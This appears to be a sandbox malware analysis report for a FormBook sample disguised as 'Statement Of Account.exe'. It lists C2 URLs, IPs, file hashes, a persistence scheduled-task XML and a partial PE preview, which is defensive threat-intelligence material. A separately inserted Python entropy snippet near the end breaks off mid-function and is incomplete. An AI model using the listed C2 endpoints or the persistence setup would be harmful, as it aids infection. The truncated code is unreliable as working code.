                                                                                          5AmzSYESuY.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.nywaiverlatam.com/kh11/?sp=Jmknm8r0fsZ3k4pSN4CZEKqCudIMVd2vl9v2BJ6TuU2yuR603/4VvUHu+6VUHV8AI6Ge&SP=cnxh5xAH
                                                                                          0wD4IaXvQH.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.northcuttmediacompany.com/kh11/?ExlpdH=Hb7mW8UWGjoRY5bqEojHo/Kku7FzWoNjOhlt8bO4JRod1UJOiQTUNOQEh0RNC8VxQKzQ&anx=TXFXCVdxMl5ty
                                                                                          dVebcwR6p0.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.marketfield.shop/fs83/?NVoluR=PxL3VQB4Sdgq6jr23wfaug9eE7OdOXWULdhKB6JBDCrnppycfZMTbfzbbQUOddPs/NlqoPz4+A==&Txl=O0GPaRWPLnPXX6
                                                                                          Scan Document Copy_docx.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.cawthonisland.com/n8t5/
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          www.airzf.comPago pendiente.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.12.38.29
                                                                                          td-ccm-neg-87-45.wixdns.nethttp://geoguesser.com/seterra/en-an/vpg/3811?C=K44CTGet hashmaliciousUnknownBrowse
                                                                                          • 34.149.87.45
                                                                                          http://geoguesser.com/seterra/en-an/vpg/3800Get hashmaliciousUnknownBrowse
                                                                                          • 34.149.87.45
                                                                                          Ola#U011fan#U00fcst#U00fc #U00f6deme.exeGet hashmaliciousFormBookBrowse
                                                                                          • 34.149.87.45
                                                                                          BL4567GH67_xls.exeGet hashmaliciousFormBookBrowse
                                                                                          • 34.149.87.45
                                                                                          https://hopp.bio/documentGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                          • 34.149.87.45
                                                                                          https://hopp.bio/pdf-documentGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                          • 34.149.87.45
                                                                                          W9PJhOS2if.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                          • 34.149.87.45
                                                                                          KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                                                          • 34.149.87.45
                                                                                          Purchase Order#44231.exeGet hashmaliciousFormBookBrowse
                                                                                          • 34.149.87.45
                                                                                          gRDcPJpgMQ.exeGet hashmaliciousFormBookBrowse
                                                                                          • 34.149.87.45
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          UNMETEREDCAPago pendiente.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.12.38.29
                                                                                          v6SEx6rJ3E.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, VidarBrowse
                                                                                          • 38.147.122.254
                                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                          • 38.147.122.253
                                                                                          SecuriteInfo.com.FileRepMalware.4269.6620.exeGet hashmaliciousUnknownBrowse
                                                                                          • 154.12.35.37
                                                                                          ckS92jgGGm.elfGet hashmaliciousMiraiBrowse
                                                                                          • 38.147.250.143
                                                                                          VFSJUqK11j.elfGet hashmaliciousMiraiBrowse
                                                                                          • 38.147.22.98
                                                                                          uCEcm0sVMK.elfGet hashmaliciousMiraiBrowse
                                                                                          • 38.147.202.241
                                                                                          Fr2X6xwNNK.elfGet hashmaliciousUnknownBrowse
                                                                                          • 38.147.26.128
                                                                                          S2So6J38N6.elfGet hashmaliciousMiraiBrowse
                                                                                          • 154.12.57.120
                                                                                          Q017PzM46q.elfGet hashmaliciousMiraiBrowse
                                                                                          • 154.12.57.120
                                                                                          ATGS-MMD-ASUShttp://geoguesser.com/seterra/en-an/vpg/3811?C=K44CTGet hashmaliciousUnknownBrowse
                                                                                          • 34.49.229.81
                                                                                          http://geoguesser.com/seterra/en-an/vpg/3800Get hashmaliciousUnknownBrowse
                                                                                          • 34.149.87.45
                                                                                          https://go-g3t-msg.com/clk/a_OsB_gBHRWO62vTWAvzpOfGhlvCmgnqQuB_nVFpwp0KsQNH4MVSSKRIuzJYdR_BaVVJ5ZUVsLA7nr4fsUb6_LUiF6WGpw3bjwuz5vIgSMwTtrE34sfAdm_UkarEQxhut5pfRW1RXCEHttsR2H4S_hK5eTdM2QP7CpynnqXHAbBrQcsZM-9kqSh5d_nLiZhEZPZ8-fFHjtAo-IjMx8qNxpwUaG3dVXhIP_Sup8raijFjXrg2qZL33tH_5PvkpDXJwZtdK-fqRvdTEjPP1v26xG4zHKIduU5irbL6N1Be1W_4vpi6D3s8twjJ8VAELgUZErAiigzfRVU0knOdQpcprkwW48npT3pYYpFqQU_lE9JBwESVd70JOVQuZWj_0cT7YVVRRta1y8F8vjFBDtNL73BXlqjP5sWlGZtuOnQDJ-iEKMXGy1W4uSrGBn5j07qBR3I1glqsVkAz7msz4iUFsVZ76hS_yvRcDNZBMYnXgKJRgA1A2nVJ9rwv5a55G82GhCYmOQvkUs0eG7vFHjr8gNQtxUn0q5LeVhTPJbym_uRj-gxiLJDjsLnSJXJ4eGtDvxVqhkaqM2P03jYs6BzR_fyd4ak2ZNKBm4FiGWKP44e6keEO2eNlfhZPBYG9OMlI3UM7jaU5YayqoO3ZGet hashmaliciousUnknownBrowse
                                                                                          • 34.149.124.125
                                                                                          oVOImRIAaz.elfGet hashmaliciousMiraiBrowse
                                                                                          • 34.165.16.62
                                                                                          NMdpQecbkg.elfGet hashmaliciousMiraiBrowse
                                                                                          • 32.61.182.142
                                                                                          1mHUcsxKG6.elfGet hashmaliciousMiraiBrowse
                                                                                          • 32.173.179.64
                                                                                          xzk9TKqNoI.elfGet hashmaliciousMiraiBrowse
                                                                                          • 32.90.151.127
                                                                                          sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                          • 57.253.16.154
                                                                                          sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                          • 34.169.234.162
                                                                                          nagateliteqfUK.exeGet hashmaliciousAZORult++Browse
                                                                                          • 34.160.144.191
                                                                                          SEDO-ASDEPO0423024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.19
                                                                                          PO0423023.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.19
                                                                                          PO 26519PZ F30 59.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 91.195.240.117
                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.19
                                                                                          PO_PDF24172024.scr.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.117
                                                                                          Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 91.195.240.19
                                                                                          eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.117
                                                                                          SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.94
                                                                                          PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 91.195.240.19
                                                                                          PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 91.195.240.19
                                                                                          No context
                                                                                          No context
Process: C:\Users\user\AppData\Roaming\SdYCcXyq.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Users\user\Desktop\Statement Of Account.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.379736180876081
Encrypted: false
SSDEEP: 48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyuVws:tLHyIFKL3IZ2KRH9OugbVws
MD5: 309A50A114E63D1E572754724776386D
SHA1: BB6BCDD6CB7D94B3CE56404054F0CC463309F4B2
SHA-256: 77148DAFF9333012558B6E4165D6EB819E431EAD853778D8F53C6C5570E5BB59
SHA-512: 6EEB094D32A14C38B2CD79A25545643852B2AF81CA3683D3CC7E8D14C675405125E49B369BD8173F30EF64C0813D660012AFC6CBE77671081B8936C0C81F6B40
Malicious: false
Preview: @...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Users\user\Desktop\Statement Of Account.exe
                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):1574
                                                                                          Entropy (8bit):5.117435309308349
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta7xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8v
                                                                                          MD5:5BB8995E540EA0C5FDD2D926EBD3BC76
                                                                                          SHA1:72519A450958D9377DB308B10459D98556F38C15
                                                                                          SHA-256:FB48F23B864BCCDD3A31EB79C7E9C72E910FE70A3B0CB9569A966A8A1CE7BA07
                                                                                          SHA-512:16DB902A65E167376B8FB4883440AEE883C3606C4D63FB6653D176BD55E6BBC59A797AD53C974C7DF46B046E35527033D53A918B505DC23D90CED7B2F4956831
                                                                                          Malicious:true
                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                          Process:C:\Users\user\AppData\Roaming\SdYCcXyq.exe
                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):1574
                                                                                          Entropy (8bit):5.117435309308349
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta7xvn:cge1wYrFdOFzOzN33ODOiDdKrsuT8v
                                                                                          MD5:5BB8995E540EA0C5FDD2D926EBD3BC76
                                                                                          SHA1:72519A450958D9377DB308B10459D98556F38C15
                                                                                          SHA-256:FB48F23B864BCCDD3A31EB79C7E9C72E910FE70A3B0CB9569A966A8A1CE7BA07
                                                                                          SHA-512:16DB902A65E167376B8FB4883440AEE883C3606C4D63FB6653D176BD55E6BBC59A797AD53C974C7DF46B046E35527033D53A918B505DC23D90CED7B2F4956831
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                          Process:C:\Users\user\Desktop\Statement Of Account.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):791040
                                                                                          Entropy (8bit):7.022673278804772
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:xSNhWU2EOum32U5Gt68PG+SAJYyEQzHmt5xCohEotOJ6E+L+BtN:xSLrvUGt07MY9xCohEl8LaN
                                                                                          MD5:DA68E8FF4E0C0D00C613FA9301CF4A37
                                                                                          SHA1:7456CF2540DCE6403407B532C502CE5ABB07E9EC
                                                                                          SHA-256:B7DEF3AF905789A4ECEDCC226D91592D8BC758CE8C5458D62EF435707DE8670F
                                                                                          SHA-512:3AC31E76311AD1ACEC983DEDB6F2142471A6225BB279A5C9425FD75A15971D2E635EC4D7DFC8A060B1D647EF67D168504452A4ACF4500047F31C63C932DE99F6
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 24%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u.'f..............0..............&... ...@....@.. ....................................@..................................&..O....@.......................`......D...T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H........O...!....../....q..............................................B...}......}....*".(.....*...0............{.....+..*&...}....*B...}......}....*".(.....*V.(........s....}....*...0..E........r...p.{....s......s.....s......{....o.......o....&.{....o.......+..*....0..A..........{....s......s.....s......{....o.......o....&.{....o.......+..*^..}.....(.......(.....*....0...........s.......{....o.....{....o....o-.....{<...r3..p.{=...r3..p(....(....&r7..ps......o.....r...p.s..
                                                                                          Process:C:\Users\user\Desktop\Statement Of Account.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:false
                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.022673278804772
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:Statement Of Account.exe
                                                                                          File size:791'040 bytes
                                                                                          MD5:da68e8ff4e0c0d00c613fa9301cf4a37
                                                                                          SHA1:7456cf2540dce6403407b532c502ce5abb07e9ec
                                                                                          SHA256:b7def3af905789a4ecedcc226d91592d8bc758ce8c5458d62ef435707de8670f
                                                                                          SHA512:3ac31e76311ad1acec983dedb6f2142471a6225bb279a5c9425fd75a15971d2e635ec4d7dfc8a060b1d647ef67d168504452a4acf4500047f31c63c932de99f6
                                                                                          SSDEEP:12288:xSNhWU2EOum32U5Gt68PG+SAJYyEQzHmt5xCohEotOJ6E+L+BtN:xSLrvUGt07MY9xCohEl8LaN
                                                                                          TLSH:D4F49E3D18BE22BB81B9C6A9CFD5882BF540E46B7051AD7498D747A55343E4B38C323E
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u.'f..............0..............&... ...@....@.. ....................................@................................
                                                                                          Icon Hash:90cececece8e8eb0
                                                                                          Entrypoint:0x4c26e2
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x6627C475 [Tue Apr 23 14:23:49 2024 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc268d | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5c4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc1344 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc06e8 | 0xc0800 | ad3f0459f9e92d15dc36ffff13beb716 | False | 0.7428305093344156 | data | 7.029755289423976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc4000 | 0x5c4 | 0x600 | ef6b1b1acac0f947d51056f81b57256a | False | 0.421875 | data | 4.1111917842426315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc6000 | 0xc | 0x200 | 4231205143541a27ddc6e9ad2ec73c28 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
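
The Entropy and ZLIB Complexity columns are the quickest tells in this table: .text at 7.03 bits per byte, nearly 790 KB of it, is far above what plain IL or native code produces (typically 5 to 6 bits per byte), which is what an encrypted payload stored inside the section looks like. The following is an added example, not part of the Joe Sandbox report, showing how those two numbers are computed and how to turn them into a per-section triage verdict. The section contents are constructed stand-ins, since the report does not reproduce the sample's bytes, and the ZLIB Complexity formula (compressed size divided by raw size) is an assumption about what the report's column measures.

```python
import math
import random
import zlib

# Constructed stand-ins for section contents (assumption: the report does not
# reproduce the sample's bytes, so these only imitate the character of each section).
_rng = random.Random(1337)
SAMPLE_SECTIONS = {
    # incompressible, uniformly distributed bytes: what an encrypted payload
    # embedded in an executable section looks like to an entropy scan
    ".text": (
        bytes(_rng.getrandbits(8) for _ in range(16384)),
        ("IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ"),
    ),
    # repetitive structured text, like a version resource or manifest
    ".rsrc": (
        b"<assembly xmlns='urn:schemas-microsoft-com:asm.v1'/>\x00" * 32,
        ("IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"),
    ),
    # a 12-byte relocation block followed by file-alignment padding
    ".reloc": (
        b"\x00\x60\x00\x00\x0c\x00\x00\x00\x00\x30\x00\x00" + b"\x00" * 500,
        ("IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_DISCARDABLE", "IMAGE_SCN_MEM_READ"),
    ),
}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
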